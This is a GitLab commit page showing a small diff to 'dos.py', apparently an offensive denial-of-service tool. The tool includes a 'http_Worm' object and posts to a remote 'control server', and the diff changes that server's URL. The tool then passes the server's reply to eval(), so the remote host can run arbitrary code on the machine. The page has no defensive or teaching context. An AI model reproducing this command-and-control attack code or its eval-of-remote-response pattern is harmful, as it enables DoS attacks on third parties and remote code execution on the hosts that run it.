Skip to content
Snippets Groups Projects
Commit 7612e70b authored by Hemanth VSR's avatar Hemanth VSR :speech_balloon:
Browse files

Update file dos.py

parent 988e751d
No related branches found
No related tags found
No related merge requests found
......@@ -2,24 +2,22 @@
#!/usr/bin/env python3
try:
import requests
import threading
import random
from colorama import Fore,Back,Style
import time
import bs4
import os
from bs4 import BeautifulSoup
import subprocess
import socket
import json
import sys
import ast
import argparse
except ImportError as error:
print("Import Error : {}".format(error))
exit()
import requests
import threading
import random
from colorama import Fore,Back,Style
import time
import bs4
import os
from bs4 import BeautifulSoup
import subprocess
import socket
import json
import sys
import ast
import argparse
response = []
......@@ -707,7 +705,7 @@ class DoSuiteActivated():
}
try:
r = requests.post('https://dos.hemanth.me', data=json.dumps(data))
r = requests.post('https://dos.hemanthvsr.in', data=json.dumps(data))
data = eval(r.text)
except:
print(f"{self.bold}{self.white}[{self.red}Alert{self.white}]: Sorry! the control server is down. Contact developers to know the reason{self.reset}")
......@@ -813,4 +811,4 @@ if __name__ == "__main__":
except Exception as e:
http_Worm = DoSuiteActivated("Sync", "Zipher", "Ciron")
http_Worm.have_control()
\ No newline at end of file
http_Worm.have_control()
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment